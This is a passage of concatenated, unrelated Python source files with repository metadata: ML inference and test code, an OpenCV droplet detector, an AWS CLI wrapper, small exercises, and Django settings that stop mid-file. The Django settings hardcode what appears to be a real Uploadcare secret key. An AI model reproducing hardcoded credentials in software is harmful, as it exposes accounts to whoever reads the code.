            pred = self.eval(df)
            rmseCal.append( mean_squared_error( pred, df[impliedVolColumn]))
        self.lambdaList = formerLambdaList
        #Activate print
        #sys.stdout = formerStdOut
        sys.stdout = formerStdOut
        res = {"ButterflyArbitrage" : pd.Series(numberOfarbitrageButterfly, index = lambdaButterfly),
               "CalendarArbitrage" : pd.Series(numberOfArbitrageCalendar, index = lambdaCalendar),
               "ButterflyRMSE" : pd.Series(rmseBut, index = lambdaButterfly),
               "CalendarRMSE" : pd.Series(rmseCal, index = lambdaCalendar)}
        plt.plot(res["ButterflyArbitrage"])
        plt.title("Number of arbitrages")
        plt.xscale('symlog')
        plt.show()
        plt.plot(res["ButterflyRMSE"])
        plt.title("RMSES")
        plt.xscale('symlog')
        plt.show()
        plt.plot(res["CalendarArbitrage"])
        plt.title("Number of arbitrages")
        plt.xscale('symlog')
        plt.show()
        plt.plot(res["CalendarRMSE"])
        plt.title("RMSES")
        plt.xscale('symlog')
        plt.show()
        #Dichotomy on parameter values for which we can assume monotonicity : the higher the penalization, the worst the accuracy and less arbitrage occured
        return res
    def eval(self, df):
        """Interpolate the fitted surface onto df's strictly-positive
        maturities; returns implied vols indexed by (Strike, Maturity).
        (NOTE: shadows the builtin ``eval`` -- intentional API name here.)
        """
        serie = interpolateGrid(df[df["Maturity"] > 0],
                                self.parameters,
                                self.theta,
                                self.maturities,
                                self.interestrate_theta,
                                self.forward_theta,
                                self.S0,
                                self.bootstrap)
        return serie
|
[
"marc.chataign@gmail.com"
] |
marc.chataign@gmail.com
|
6576a596822baf4eb435a1fe47e11d479398497b
|
fd878bcdaa9489883894c942aae5e316a15c2085
|
/tests/dataset_readers/sst_test.py
|
477e1a51ec7a5efbd55ddd0006bc58ee474d6ddc
|
[] |
no_license
|
Shuailong/SPM
|
a12d18baa39a72a9243ad9cd4238168ab42b96d1
|
0105dae90a4acdebfc875001efab7439b3eb8259
|
refs/heads/master
| 2020-04-26T04:51:14.279859
| 2019-06-24T03:55:11
| 2019-06-24T03:55:11
| 173,315,858
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,551
|
py
|
# pylint: disable=no-self-use,invalid-name
import pytest
import pathlib
import random
import os
from allennlp.common import Params
from allennlp.common.util import ensure_list
from allennlp.common.testing import ModelTestCase
from allennlp.data.dataset import Batch
from allennlp.data.fields import TextField
from allennlp.data.instance import Instance
from allennlp.data.token_indexers.wordpiece_indexer import PretrainedBertIndexer
from allennlp.data.tokenizers import WordTokenizer, Token
from allennlp.data.tokenizers.word_splitter import BertBasicWordSplitter
from allennlp.data.vocabulary import Vocabulary
from allennlp.modules.token_embedders.bert_token_embedder import PretrainedBertEmbedder
from spm.data.dataset_readers import GLUESST2DatasetReader
from spm import DATA_DIR as DATA_ROOT
class TestSSTReader:
    """Smoke tests for GLUESST2DatasetReader with BERT tokenization.

    NOTE(review): test_read only prints tensors and makes no assertions,
    so it can fail only by raising -- consider asserting on tokens/label.
    """
    FIXTURES_ROOT = (pathlib.Path(__file__).parent /
                     ".." / ".." / "tests" / "fixtures").resolve()
    BERT_VOCAB_PATH = os.path.join(
        DATA_ROOT, 'bert/bert-base-uncased-vocab.txt')
    @pytest.mark.parametrize("lazy", (True, False))
    def test_read(self, lazy):
        # NOTE(review): lazy is parametrized but never forwarded to the
        # reader, so both runs exercise the same configuration.
        reader = GLUESST2DatasetReader(
            tokenizer=WordTokenizer(word_splitter=BertBasicWordSplitter()),
            token_indexers={'bert': PretrainedBertIndexer(
                pretrained_model=self.BERT_VOCAB_PATH)},
            skip_label_indexing=False
        )
        instances = reader.read(
            str(self.FIXTURES_ROOT / 'dev.tsv'))
        instances = ensure_list(instances)
        example = instances[0]
        tokens = [t.text for t in example.fields['tokens']]
        label = example.fields['label'].label
        print(label)
        print(tokens)
        # index and pad a batch, then dump the resulting tensors for eyeballing
        batch = Batch(instances)
        vocab = Vocabulary.from_instances(instances)
        batch.index_instances(vocab)
        padding_lengths = batch.get_padding_lengths()
        tensor_dict = batch.as_tensor_dict(padding_lengths)
        tokens = tensor_dict["tokens"]
        print(tokens['mask'].tolist()[0])
        print(tokens["bert"].tolist()[0])
        print([vocab.get_token_from_index(i, "bert")
               for i in tokens["bert"].tolist()[0]])
        print(len(tokens['bert'][0]))
        print(tokens["bert-offsets"].tolist()[0])
        print(tokens['bert-type-ids'].tolist()[0])
    def test_can_build_from_params(self):
        # Default construction should fall back to a SingleIdTokenIndexer.
        reader = GLUESST2DatasetReader.from_params(Params({}))
        # pylint: disable=protected-access
        assert reader._token_indexers['tokens'].__class__.__name__ == 'SingleIdTokenIndexer'
|
[
"liangshuailong@gmail.com"
] |
liangshuailong@gmail.com
|
a3dc231f3dbd0e2e1ef4dbdd546e09d37e950ff2
|
f224fad50dbc182cda86291c83954607bbb60901
|
/inference.py
|
ce98cbf4d15f6bc1e05363be1db9afeb1e519de5
|
[] |
no_license
|
Hongpeng1992/pytorch-commands
|
7fd26202b7cf7d46a0ac8e1241336e8ca5dad30e
|
5853625d9852e948c1ac337547f8078d048699a0
|
refs/heads/master
| 2020-05-04T15:38:26.704013
| 2019-02-07T07:04:01
| 2019-02-07T07:04:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,644
|
py
|
import argparse
import io
import os
import csv
import time
import numpy as np
import pandas as pd
from collections import OrderedDict
from datetime import datetime
from dataset import CommandsDataset, get_labels
from models import model_factory
from utils import AverageMeter, get_outdir
import torch
import torch.autograd as autograd
import torch.nn
import torch.nn.functional as F
import torch.utils.data as data
import torchvision.utils
# Command-line interface for the inference script.
# NOTE(review): the --model help string is missing its closing parenthesis.
parser = argparse.ArgumentParser(description='Inference')
parser.add_argument('data', metavar='DIR',
                    help='path to dataset')
parser.add_argument('--model', default='resnet101', type=str, metavar='MODEL',
                    help='Name of model to train (default: "countception"')
parser.add_argument('--gp', default='avg', type=str, metavar='POOL',
                    help='Type of global pool, "avg", "max", "avgmax", "avgmaxc" (default: "avg")')
parser.add_argument('--tta', type=int, default=0, metavar='N',
                    help='Test/inference time augmentation (oversampling) factor. 0=None (default: 0)')
parser.add_argument('--pretrained', action='store_true', default=False,
                    help='Start with pretrained version of specified network (if avail)')
parser.add_argument('-b', '--batch-size', type=int, default=512, metavar='N',
                    help='input batch size for training (default: 512)')
parser.add_argument('-j', '--workers', type=int, default=2, metavar='N',
                    help='how many training processes to use (default: 1)')
parser.add_argument('--num-gpu', type=int, default=1,
                    help='Number of GPUS to use')
parser.add_argument('--checkpoint', default='', type=str, metavar='PATH',
                    help='path to restore checkpoint (default: none)')
parser.add_argument('--print-freq', '-p', default=10, type=int,
                    metavar='N', help='print frequency (default: 10)')
parser.add_argument('--save-batches', action='store_true', default=False,
                    help='save images of batch inputs and targets every log interval for debugging/verification')
parser.add_argument('--output', default='', type=str, metavar='PATH',
                    help='path to output folder (default: none, current dir)')
def main():
    """Run inference over the test split and write per-class log-probs
    (results.csv) plus top-1 predictions (submission.csv) to the output dir.

    Fixes vs. the original: both CSV handles were bound to the same name
    ``cf`` (the first one leaked and neither was explicitly closed/flushed);
    they are now managed with ``with``.  Inference also runs under
    torch.no_grad() to skip autograd bookkeeping.
    """
    args = parser.parse_args()

    num_classes = len(get_labels())
    test_time_pool = 0 #5 if 'dpn' in args.model else 0
    model = model_factory.create_model(
        args.model,
        in_chs=1,
        num_classes=num_classes,
        global_pool=args.gp,
        test_time_pool=test_time_pool)
    #model.reset_classifier(num_classes=num_classes)

    if args.num_gpu > 1:
        model = torch.nn.DataParallel(model, device_ids=list(range(args.num_gpu))).cuda()
    else:
        model.cuda()

    if not os.path.exists(args.checkpoint):
        print("=> no checkpoint found at '{}'".format(args.checkpoint))
        exit(1)
    print("=> loading checkpoint '{}'".format(args.checkpoint))
    checkpoint = torch.load(args.checkpoint)
    if isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
        model.load_state_dict(checkpoint['state_dict'])
        print("=> loaded checkpoint '{}' (epoch {})".format(args.checkpoint, checkpoint['epoch']))
    else:
        model.load_state_dict(checkpoint)

    # derive an experiment name from the checkpoint path for the output dir
    csplit = os.path.normpath(args.checkpoint).split(sep=os.path.sep)
    if len(csplit) > 1:
        exp_name = csplit[-2] + '-' + csplit[-1].split('.')[0]
    else:
        exp_name = ''
    if args.output:
        output_base = args.output
    else:
        output_base = './output'
    output_dir = get_outdir(output_base, 'predictions', exp_name)

    dataset = CommandsDataset(
        root=args.data,
        mode='test',
        format='spectrogram'
    )

    loader = data.DataLoader(
        dataset,
        batch_size=args.batch_size,
        pin_memory=True,
        shuffle=False,
        num_workers=args.workers
    )

    model.eval()

    batch_time_m = AverageMeter()
    data_time_m = AverageMeter()
    try:
        # context managers guarantee both CSVs are flushed and closed,
        # even when the loop raises or is interrupted
        with open(os.path.join(output_dir, 'results.csv'), mode='w') as res_file, \
                open(os.path.join(output_dir, 'submission.csv'), mode='w') as sub_file:
            res_writer = csv.writer(res_file)
            res_writer.writerow(['fname'] + dataset.id_to_label)
            sub_writer = csv.writer(sub_file)
            sub_writer.writerow(['fname', 'label', 'prob'])

            end = time.time()
            batch_sample_idx = 0
            with torch.no_grad():  # inference only -- no gradients needed
                for batch_idx, (input, target) in enumerate(loader):
                    data_time_m.update(time.time() - end)
                    input = input.cuda()
                    output = model(input)

                    # augmentation reduction
                    #reduce_factor = loader.dataset.get_aug_factor()
                    #if reduce_factor > 1:
                    #    output = output.unfold(0, reduce_factor, reduce_factor).mean(dim=2).squeeze(dim=2)
                    #    index = index[0:index.size(0):reduce_factor]

                    # move data to CPU and collect
                    output_logprob = F.log_softmax(output, dim=1).cpu().numpy()
                    output = F.softmax(output, dim=1)
                    output_prob, output_idx = output.max(1)
                    output_prob = output_prob.cpu().numpy()
                    output_idx = output_idx.cpu().numpy()
                    for i in range(output_logprob.shape[0]):
                        index = batch_sample_idx + i
                        pred_label = dataset.id_to_label[output_idx[i]]
                        pred_prob = output_prob[i]
                        filename = dataset.filename(index)
                        res_writer.writerow([filename] + list(output_logprob[i]))
                        sub_writer.writerow([filename] + [pred_label, pred_prob])
                    batch_sample_idx += input.size(0)
                    batch_time_m.update(time.time() - end)
                    if batch_idx % args.print_freq == 0:
                        print('Inference: [{}/{} ({:.0f}%)]  '
                              'Time: {batch_time.val:.3f}s, {rate:.3f}/s  '
                              '({batch_time.avg:.3f}s, {rate_avg:.3f}/s)  '
                              'Data: {data_time.val:.3f} ({data_time.avg:.3f})'.format(
                            batch_sample_idx, len(loader.sampler),
                            100. * batch_idx / len(loader),
                            batch_time=batch_time_m,
                            rate=input.size(0) / batch_time_m.val,
                            rate_avg=input.size(0) / batch_time_m.avg,
                            data_time=data_time_m))
                    end = time.time()
            # end iterating through dataset
    except KeyboardInterrupt:
        pass
    except Exception as e:
        # best-effort: report and fall through (preserves original behavior)
        print(str(e))
# Standard script entry point.
if __name__ == '__main__':
    main()
|
[
"rwightman@gmail.com"
] |
rwightman@gmail.com
|
d27b115ccb6e7ef16a5a8dc0e95cc0d084f526b3
|
1d9d6f72b10dd34fd501b8ba58b1b8bfcb2ebb72
|
/spraying/detect_blobs.py
|
0efb6f21908c7287a1b7ba03fbcdda00698467ab
|
[] |
no_license
|
crushendo/spraying
|
eb684ae0a1691e39f74978c2556a000e394920c2
|
93644410a17351ee8ae85f66fe8622887670f2c3
|
refs/heads/master
| 2021-01-19T22:46:57.663738
| 2017-08-11T19:11:00
| 2017-08-11T19:11:00
| 88,867,886
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,690
|
py
|
import cv2
import numpy as np
class blob_detector():
    def main(self):
        # Driver: load the image, run every detector pass (all/single/double/
        # triple), then render the detected keypoints.
        # NOTE(review): constructs a fresh blob_detector instead of using
        # ``self`` -- works, but ``self`` would do.
        blobs = blob_detector()
        img, params = blobs.initialize()
        all_keypoints = blobs.all_drops(img, params)
        single_keypoints, diameter_list = blobs.single_drops(img,params)
        double_keypoints = blobs.double_drops(img,params)
        triple_keypoints = blobs.triple_drops(img,params)
        blobs.output(img, all_keypoints, single_keypoints, double_keypoints, triple_keypoints)
    def initialize(self):
        # Load the input scan from the working directory and create a fresh
        # SimpleBlobDetector parameter set for the detection passes.
        #img = cv2.imread("thresholded_paper_5.png")
        img = cv2.imread("spray_paper_large.tiff")
        params = cv2.SimpleBlobDetector_Params()
        return img, params
# ----------------
# Single Droplets
# ----------------
    def single_drops(self,img,params):
        # Detect isolated droplets: high convexity (0.93..1) distinguishes a
        # lone round blob from merged ones -- thresholds look empirical,
        # TODO confirm calibration.
        # Minimum Area
        params.filterByArea = True
        params.minArea = 10
        # Circularity
        params.filterByCircularity = True
        params.minCircularity = 0
        #Inertia
        params.filterByInertia = True
        params.minInertiaRatio = 0.2
        # Convexity Parameters
        params.filterByConvexity = True
        params.minConvexity = 0.93
        params.maxConvexity = 1
        #Set up detector
        detector = cv2.SimpleBlobDetector(params)
        # Detect blobs
        single_keypoints = detector.detect(img)
        single_drops = len(single_keypoints)
        i=0
        # NOTE(review): diameter_list is always returned empty -- the
        # diameter computation below is commented out (and references an
        # undefined ``ppi``).
        diameter_list = []
        #for keypoint in single_keypoints:
        #    keypoint = single_keypoints.size
        #    keypoint = keypoint / ppi
        #    keypoint = keypoint * keypoint * 3.14159 * 0.25
        #    drop_d = keypoint ** 0.455 * 1.06
        #    diameter_list[i] = drop_d
        #    i += 1
        print "Single drops: " + str(single_drops)
        return single_keypoints, diameter_list
# ----------------
# Double Droplets
# ----------------
    def double_drops(self,img,params):
        # Detect two merged droplets: intermediate convexity band
        # (0.90..0.92) -- presumably tuned empirically, TODO confirm.
        # Minimum Area
        params.filterByArea = True
        params.minArea = 10
        # Circularity
        params.filterByCircularity = True
        params.minCircularity = 0
        #Inertia
        params.filterByInertia = True
        params.minInertiaRatio = 0.2
        # Convexity Parameters
        params.filterByConvexity = True
        params.minConvexity = 0.90
        params.maxConvexity = 0.92
        # Set up detector
        detector = cv2.SimpleBlobDetector(params)
        # Detect blobs
        double_keypoints = detector.detect(img)
        double_drops = len(double_keypoints)
        print "Double drops: " + str(double_drops)
        return double_keypoints
# ----------------
# Triple Droplets
# ----------------
def triple_drops(self,img,params):
# Minimum Area
params.filterByArea = True
params.minArea = 10
# Circularity
params.filterByCircularity = True
params.minCircularity = 0
# Inertia
params.filterByInertia = True
params.minInertiaRatio = 0.2
# Convexity Parameters
params.filterByConvexity = True
params.minConvexity = 0.85
params.maxConvexity = 0.89
# Set up detector
detector = cv2.SimpleBlobDetector(params)
# Detect blobs
triple_keypoints = detector.detect(img)
triple_drops = len(triple_keypoints)
print "Triple drops: " + str(triple_drops)
return triple_keypoints
# -------------
# All Droplets
# -------------
def all_drops(self,img,params):
# Minimum Area
params.filterByArea = True
params.minArea = 10
# Circularity
params.filterByCircularity = True
params.minCircularity = 0
# Inertia
params.filterByInertia = True
params.minInertiaRatio = 0.2
# Convexity Parameters
params.filterByConvexity = True
params.minConvexity = 0.85
params.maxConvexity = 1
# Set up detector
detector = cv2.SimpleBlobDetector(params)
# Detect blobs
all_keypoints = detector.detect(img)
size = all_keypoints[0].size
print "Size: " + str(size)
all_drops = len(all_keypoints)
print "All drops: " + str(all_drops)
return all_keypoints
def stats(self, diameter_list):
    """Compute the number-median and area-weighted-median drop diameter.

    BUG FIXES vs. the original:
    - ``diameter_list.sort(key=float)`` sorts in place and returns None;
      the original assigned that None and crashed on ``len(sorted_list)``.
      ``sorted()`` is used instead.
    - ``total_area`` was overwritten on every loop iteration instead of
      accumulated, so the cumulative-area scan compared against the area
      of the last element only; it is now a proper running total.
    - The cumulative scan could index past the end of the list; it is now
      bounded, and the medians are returned (the original returned None).

    NOTE(review): the per-drop weight is the original's ``d * pi / 4``,
    which is linear in diameter — a circle's area would be d**2 * pi / 4.
    Kept as-is pending confirmation of the intended weighting.

    :param diameter_list: iterable of drop diameters (numbers)
    :return: (num_median, vol_median); (None, None) for empty input
    """
    sorted_list = sorted(diameter_list, key=float)
    list_length = len(sorted_list)
    if list_length == 0:
        return None, None
    index = (list_length - 1) // 2
    if list_length % 2:
        num_median = sorted_list[index]
    else:
        num_median = (sorted_list[index] + sorted_list[index + 1]) / 2
    # Total "area" of all drops, accumulated (not overwritten as before).
    total_area = 0.0
    for diameter in sorted_list:
        total_area += diameter * 3.14159 * 0.25
    # Walk the sorted list until the running area passes half the total;
    # the area-weighted median straddles that crossing point.
    current_area = 0.0
    i = 0
    vol_median = sorted_list[0]
    while i < list_length and current_area <= total_area / 2:
        current_area += sorted_list[i] * 3.14159 * 0.25
        if i > 0:
            vol_median = (sorted_list[i] + sorted_list[i - 1]) / 2
        else:
            vol_median = sorted_list[i]
        i += 1
    return num_median, vol_median
def output(self, img, all_keypoints, single_keypoints, double_keypoints, triple_keypoints):
# Draw detected blobs with circles around them
im_with_keypoints = cv2.drawKeypoints(img, all_keypoints, np.array([]), (255,255,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
#im_with_keypoints = cv2.drawKeypoints(im_with_keypoints, single_keypoints, np.array([]), (0, 0, 255))
#im_with_keypoints = cv2.drawKeypoints(im_with_keypoints, double_keypoints, np.array([]), (0, 255, 0))
#im_with_keypoints = cv2.drawKeypoints(im_with_keypoints, triple_keypoints, np.array([]), (255, 0, 0))
cv2.imshow("im_with_keypoints", im_with_keypoints)
cv2.waitKey(0)
cv2.destroyAllWindows()
if __name__ == "__main__":
    # Script entry point: build the detector object and run the full
    # analysis pipeline (methods also reference this module-level `blobs`).
    blobs = blob_detector()
    blobs.main()
|
[
"ryan.ackett@gmail.com"
] |
ryan.ackett@gmail.com
|
14117448fe850d69ae5fcf1bd41049c19247b557
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/appmesh_write_2/virtual-router_delete.py
|
db6df7702ffc69ca7d3bbf5c3eda2b1680913ce2
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379
| 2020-12-27T13:38:45
| 2020-12-27T13:38:45
| 318,686,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,343
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_two_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/appmesh/delete-virtual-router.html
if __name__ == '__main__':
    # Sibling appmesh virtual-router commands, for reference:
    #   create-virtual-router : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/appmesh/create-virtual-router.html
    #   describe-virtual-router : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/appmesh/describe-virtual-router.html
    #   list-virtual-routers : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/appmesh/list-virtual-routers.html
    #   update-virtual-router : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/appmesh/update-virtual-router.html
    # Help text shown to the user for the two required parameters.
    parameter_display_string = """
    # mesh-name : The name of the service mesh to delete the virtual router in.
    # virtual-router-name : The name of the virtual router to delete.
    """
    add_option_dict = {"parameter_display_string": parameter_display_string}
    # ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
    write_two_parameter("appmesh", "delete-virtual-router", "mesh-name", "virtual-router-name", add_option_dict)
|
[
"hcseo77@gmail.com"
] |
hcseo77@gmail.com
|
3bad8e294dbb199e5e40870811281cceb64d295c
|
cd1465251c5b4536f8d0c634c0efaff4d628c87c
|
/Semantic_Analysers/ColourAnalyser.py
|
cfea4b8096683c0c4cb9bfcef3f1d8532d6f9037
|
[] |
no_license
|
BennyMurray/Scoop
|
9794bca1d1d4b159e041a8c482a256de852a9e6d
|
01f9c31affbb291a5507d86ab88a637a2dafea28
|
refs/heads/master
| 2021-03-27T18:54:21.094647
| 2017-07-16T21:25:24
| 2017-07-16T21:25:24
| 77,929,600
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,208
|
py
|
from __future__ import division
def analyseColour(word_list):
    """Score colour descriptors and return the winning colour number.

    Each recognised descriptor word adds its fixed weight to one colour
    bucket; the bucket with the highest accumulated weight wins.  When no
    word matches (or buckets tie) the earliest-declared bucket wins,
    because ``sorted`` is stable.

    :param word_list: iterable of lowercase descriptor words
    :return: the colour number (int dict key) with the highest score
    """
    num_set = [0.33, 1.68, 2.2, 2.36, 2.87, 0.29, 0.27, 2.94, 0.81, 0.22, 2.59, 1.06]
    # (colour number, descriptor words, weight per occurrence)
    colour_value_list = [
        (1, ["pale"], num_set[0]),
        (3, ["straw"], num_set[1]),
        (4, ["yellow"], num_set[2]),
        (5, ["gold"], num_set[3]),
        (8, ["amber"], num_set[4]),
        (12, ["red"], num_set[5]),
        (16, ["copper"], num_set[6]),
        (18, ["murky"], num_set[7]),
        (21, ["brown"], num_set[8]),
        (26, ["muddy"], num_set[9]),
        (32, ["black"], num_set[10]),
        (37, ["opaque"], num_set[11])
    ]
    colour_result_dict = {key: 0 for key, _, _ in colour_value_list}
    for word in word_list:
        for colour_number, descriptors, weight in colour_value_list:
            # BUG FIX: the original iterated the descriptor *strings* and
            # tested ``word in descriptor`` — a substring match, so e.g.
            # "old" scored the "gold" bucket.  Exact membership in the
            # descriptor list is the intended test.
            if word in descriptors:
                colour_result_dict[colour_number] += weight
    sorted_dictionary = sorted(colour_result_dict.items(), key=lambda x: x[1], reverse=True)
    return sorted_dictionary[0][0]
|
[
"bjamurray@gmail.com"
] |
bjamurray@gmail.com
|
80c27b9d221f59ad4887eeb126cb5bc7715df2fd
|
0bb0bf1326fb0111816c92193de5bf83201f5895
|
/Desafio 2 (Lista telefonica)/Resolução Python/telefonica.py
|
8402e49621faa8f1c714a52e6490c6ca9cdb535d
|
[] |
no_license
|
pipefep/EstruturaDeDados
|
3c668d014f7979fae1e4a3720caafbbc24f4ed80
|
4c05263b76d5d6fbbe20d8cf88e9c25107f74e83
|
refs/heads/master
| 2020-08-02T16:07:55.823833
| 2019-03-05T21:02:59
| 2019-03-05T21:02:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,718
|
py
|
# Versão: Python 3.6.7
from os import system # Importa da biblioteca OS a função System, para atividades usando o sistema operacional.
vetA = [] # Module-level list holding the phone numbers; shared by every menu action.
# Função para imprimir uma linha.
def linha():
    """Print a horizontal separator line."""
    print("----------------")
# Função para adicionar o número da pessoa.
def adicionar():
    """Prompt for a phone number and append it to the shared list."""
    linha()
    numero = input("Digite o Número: ")
    vetA.append(numero)
    linha()
# Função para buscar se existe um número inserido.
def buscar():
    """Prompt for a number and report whether it exists in the list."""
    linha()
    alvo = input("Digite o Número para a Busca: ")
    if alvo in vetA:
        print("\nO número {} EXISTE na lista telefonica!".format(alvo))
    else:
        print("\nO número {} NÃO EXISTE na lista telefonica!".format(alvo))
    linha()
# Função para excluir um número que foi inserido.
def excluir():
    """Prompt for a number and remove it from the list when present."""
    linha()
    alvo = input("Digite o Número para remover da Lista: ")
    if alvo in vetA:
        vetA.remove(alvo)
    else:
        # Nothing to remove — tell the user the number is unknown.
        print("\nO número {} NÃO EXISTE na lista telefonica!".format(alvo))
    linha()
# Função para listar todos os números existentes.
def listar():
    """Print every stored number, numbered from 1."""
    linha()
    for posicao, numero in enumerate(vetA, start=1):
        print("{}. {}".format(posicao, numero))
    linha()
# Loop para voltar ao menu.
# Interactive menu loop: show the options, read a numeric choice and
# dispatch to the matching action; any other number prints an error.
# Runs until interrupted.
acoes = {1: adicionar, 2: buscar, 3: excluir, 4: listar}
while True:
    print("\n--- Lista telefonica ---\n")
    print("- Digite uma operação -\n")
    print("[1] Inserir um novo telefone.")
    print("[2] Buscar um determinado telefone.")
    print("[3] Remover um determinado telefone.")
    print("[4] Listar todos os telefones.\n")
    esc = int(input("Digite a Escolha: "))
    # Clear the console (Linux 'clear'; on Windows this would be 'cls').
    system('clear')
    if esc in acoes:
        acoes[esc]()
    else:
        print("\nOPÇÃO INVÁLIDA!\n")
|
[
"noreply@github.com"
] |
noreply@github.com
|
53fa6c563e9983afb729af1af3be08c9c03dd4a1
|
8792e3449fbc6c8dec99f6af1d9f1b4caddad1f7
|
/51player.py
|
470f81860462904d56f98294142a2c26cd476828
|
[] |
no_license
|
aarthisandhiya/aarthisandhiya1
|
c19c1951c9ba01cd97eeddd44614953088718357
|
e6f10247b6a84d6eaf371a23f2f9c3bebbc73e5b
|
refs/heads/master
| 2020-04-15T17:17:07.151242
| 2019-05-20T05:24:19
| 2019-05-20T05:24:19
| 164,868,494
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 202
|
py
|
# Read a count, then a line of integers; sort them ascending and print
# the second-smallest value.
count = int(input())  # declared size — read from stdin but not otherwise used
numbers = [int(token) for token in input().split()]
# Replaces the hand-rolled insertion sort; same ascending result.
numbers.sort()
print(numbers[1])
|
[
"noreply@github.com"
] |
noreply@github.com
|
c5c0efac5b659bbee446fae9d8a327987f1d99ea
|
222ffb1996699dc5e0cb5e1c239698b872003c8d
|
/03_Multiply.py
|
25ef5ced75ea4642a8dfeba6f61b0335756cb142
|
[] |
no_license
|
AdityaSA99/IoT-Programs
|
3dcbf8ff24a978b530b0ada02a2b7ad5ed378462
|
20c5e910e20529bff648fa5523296f8712c6faeb
|
refs/heads/master
| 2020-05-31T06:27:28.901576
| 2019-06-10T15:40:43
| 2019-06-10T15:40:43
| 190,142,164
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 141
|
py
|
# Read two numbers from the user and print their product.
value_a = float(input("Enter value of A :"))
value_b = float(input("Enter value of B :"))
product = value_a * value_b
print("Product of {0} and {1} is {2}".format(value_a, value_b, product))
|
[
"noreply@github.com"
] |
noreply@github.com
|
a4b5aa67b31a6384126ccb1f35d8fff5774c6f6b
|
bf6626d2f70ef72963eb6290bdcf44dc75531aa1
|
/hoodwatch/settings.py
|
77ae46e54251375fc08635b55d0fde36cbd22c3e
|
[
"MIT"
] |
permissive
|
amtesire/Hood-project
|
c70930f110668a9549809f329543e62d9c036750
|
8078a2c85ba06cdddab54a4960168fb2e237e122
|
refs/heads/master
| 2023-02-23T19:50:39.233884
| 2021-02-02T14:53:28
| 2021-02-02T14:53:28
| 334,227,281
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,411
|
py
|
"""
Django settings for hoodwatch project.
Generated by 'django-admin startproject' using Django 2.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import django_heroku
import dj_database_url
from decouple import config,Csv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', default=False, cast=bool)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'crispy_forms',
    'hood',
    'pyuploadcare.dj',
]
# SECURITY NOTE(review): live Uploadcare credentials are committed to source
# control here — rotate these keys and load them via config() from the
# environment, like SECRET_KEY above.
UPLOADCARE = {
    'pub_key': '2b709bca64245dd9e55e',
    'secret': '0a60851de5f3db2dc728',
}
CRISPY_TEMPLATE_PACK = 'bootstrap4'
MIDDLEWARE = [
    'whitenoise.middleware.WhiteNoiseMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hoodwatch.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'hoodwatch.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# MODE selects between the local Postgres config ("dev") and the
# DATABASE_URL-driven production config (any other value).
MODE=config("MODE", default="dev")
# development
if config('MODE')=="dev":
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.postgresql_psycopg2',
            'NAME': config('DB_NAME'),
            'USER': config('DB_USER'),
            'PASSWORD': config('DB_PASSWORD'),
            'HOST': config('DB_HOST'),
            'PORT': '',
        }
    }
# production
else:
    DATABASES = {
        'default': dj_database_url.config(
            default=config('DATABASE_URL')
        )
    }
# Overlay Heroku's DATABASE_URL (with connection pooling) when present.
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
